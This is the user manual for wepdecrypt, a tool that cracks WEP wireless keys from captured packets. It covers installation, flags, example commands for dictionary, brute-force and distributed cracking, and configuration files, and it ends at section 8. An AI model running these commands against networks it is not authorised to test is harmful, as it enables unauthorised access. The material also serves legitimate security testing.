Wepdecrypt is a Wireless LAN Tool
written in c which guesses WEP Keys based
on a active dictionary attack,
key generator, distributed network attack
and some other methods, it's
based on wepattack and GPL licensed
2. What you need to
install
wepdecrypt.
To install wepdecrypt you need these libraries:
- libpcap (http://www.tcpdump.org/)
- libz (http://www.zlib.net/)
- openssl
(http://www.openssl.org/)
- fltk (Optional used to compile the grafic interface (needs to be
>= 1.1.6))
Libz comes with almost every distro so you have to worry to install the
two
others, besides that in some
distros you also have to install package
headers (usually -dev packages).
Once you have installed these
libraries just type:
./configure; make
To Install without the gui type
./configure --disable-gui; make
You also can specify dest directory with
./configure --with-dest-dir=destdir; make
To disable wkeygen tool
./configure --disable-keygentool; make
(and as root)
make install
Other options are available for
make:
make clean - cleans the installation environment.
make purge - similar to clean
option but you will need to rerun
./configure.
make uninstall - uninstalls the
package (needs root privileges).
Installing john the ripper is
also highly recommended but it's not
mandatory. Wepdecrypt will only
work in little endian Linux environments
don't try in others actually x86
and mips archs have been successfully
tested.
3. Short explanation
about
dumpfiles.
Dumpfiles are the main piece to make wepdecrypt work, these files
contain
the encrypted packets that
wepdecrypt must obtain the key, wepdecrypt
itself didn't generates such
kind of files so you need another program to
generate them, I suggest you to
use kismet (http://www.kismetwireless.net/)
in any way any program that
generate libpcap dumps will work.
The dumpfile needs to have at
least one encrypted packet in order to get
wepdecrypt working (one
encrypted packet is all that wepdecrypt needs to
work so you don't have to
generate huge dumpfiles).
At this stage you should have wepdecrypt installed and a fresh dumpfile
available in your system so it's
the time to show wepdecrypt in action.
First of all the options:
-f dumpfile
Network dumpfile to read in PCAP
format (as TCPDUMP, ETHEREAL or
KISMET uses)
-s Server mode, it's used to use
wepdecrypt as a server daemon to
manage a distributed network
attack (doesn't work in windows)
-w wordfile
Take keys from a file to perform
a dicctionary attack (not valid
with 64 or 128 mode)
-b mac_address
Filter an address from the dump
file this is done to decrypt
only the keys from one access
point (referenced by mac), if the
provided ap mac isn't found the
program will try to decrypt all
networks found in dumpfile
-m mode
Specifies the decrypting mode
(default all) values: 64, 128,
n64, n128, nall
-i Key This option is for the
internal key generator (used with 64 or
128 mode) it specifies the start
key
-e Key This option is for the
internal key generator (used with 64 or
128 mode) it specifies the last
key
-c server:port
Client mode, server is the host
where wepdecrypt is running in
server mode and port it's the
number port where the server is
listening
-n network
Network is a number and
specifies the maximum number of keys to
decrypt by default wepdecrypt
will try to decrypt all packets
with diferent keys found
-d mode
Mode can be all, alpha, alphanumeric, numeric, random or print-
able this option is used to set the mode for the new key genera-
tor. For example "-m 64 -d numeric" will try keys from
"00000"
to "99999"
-g Used with client mode to get
the file to decrypt from the server
-l num_blocks
Used with client mode to set the
number blocks to decrypt if
num_blocks is 0 the client will
decrypt blocks while server has
blocks to assign
-v Shows current version
-?|-h Shows help menu
As a first approach I suggest
you to use wepdecrypt_inc script or a
dicctionary to try common used
keys.
wepdecrypt_inc dumpfile
wepdecrypt -f dumpfile -w
dictionary_file
Now lets going to see some other
methods:
wepdecrypt -f
dumpfile -m64 -i 00:00:00:00:00 -e FF:FF:FF:FF:FF:FF
wepdecrypt -f dumpfile -m128 -i 11:22:33:44:55:66:77:88:99:0A:0B:0C:0D
wepdecrtpt -f dumpfile -m64 -d alpha
wepdecrtpt -f dumpfile -m128 -d all
This uses the internal key
generator to try all specified keys, you can
stop wepdecrypt at any time and
resume the session later. Take a look at
the logfile and use the last key
as init key to continue the cracking
session. If init key is not
specified 00:..:00 will be used and if last key
is not specified FF:..:FF will
be used.
At last the most powerful mode
the distributed network attack, first of all
start wepdecrypt in server mode
wepdecrypt -s -f
local.dump -m 64&
In server mode also init key can
be specified with -i
flag.
Now execute wepdecrypt as a
client. First get the dumpfile from the server
and start wepdecrypt in client
mode
wepdecrypt -c
example.com:3657 -g
(ip number can be used instead
hostname)
wepdecrypt
-c example.com:3657 -l 0
Short explanation about packet
filters:
-b flag deserves to select an ap
(the mac of the ap must be used to select it)
-n flag deserves to select the
number of packets this is independent from -b
Now wordfile can contain hex keys which will be used as
keys. To use
this feature the first line of the word file should be HEXKEY_FILE.
$HOME/.wepdecrypt
#Wepdecrypt
configuration file
#Server
listening port
Port=3617
#Blocksize
can be set up to 1099511627775
Blocksize=4294967296 (01:00:00:00:00)
#Full path
to server logfile
Logfile=/var/tmp/wepdecrypt_s.log
#Verbosity
levels: 1 - LOW 2 - MEDIUM 3 - HIGH
Verbosity=2
I think that this is self
explanatory it handles server configuration all
datafields must be in the file.
/etc/wedecrypt.conf
#
/etc/wedecrypt.conf
#
#
Configuration for WEPDECRYPT
# Fernando
Tarin
JOHNDIR=/usr/sbin/ (usual place)
WORDLIST=/usr/src/john-1.6/run/wordlist
This is used for wepdecrypt_inc
and wepdecrypt_word which uses john the
ripper to generate keys
In the windows version all files should be in the same directory as
wepdecrypt.
6. Graphic interface.
This
is the graphic interface for wepdecrypt. The gui is pretty
self
explanatory, every input box has a flag name, just change it with
your
desired values and hit the check button next to the input box,
besides
now, there is a new help option in the help menu (can also be
accessed
pressing "Ctrl+h") that explains every
option. To start wepdecrypt
press the start button. The default directory for
wepdecrypt output
logs is /tmp/ (in windows version
is the same directory in which
gwepdecrypt is running) it can be
changed through the gui or
$HOME/.wepdecrypt file.
7. Wkeygen.
Wkeygen
is a tool that generates WEP keys. Provided to allow the creation
of wordfiles that contains hex keys easily. Usage is pretty simple just
use
-? flag to see its options (linux version only).
8. How to help the project.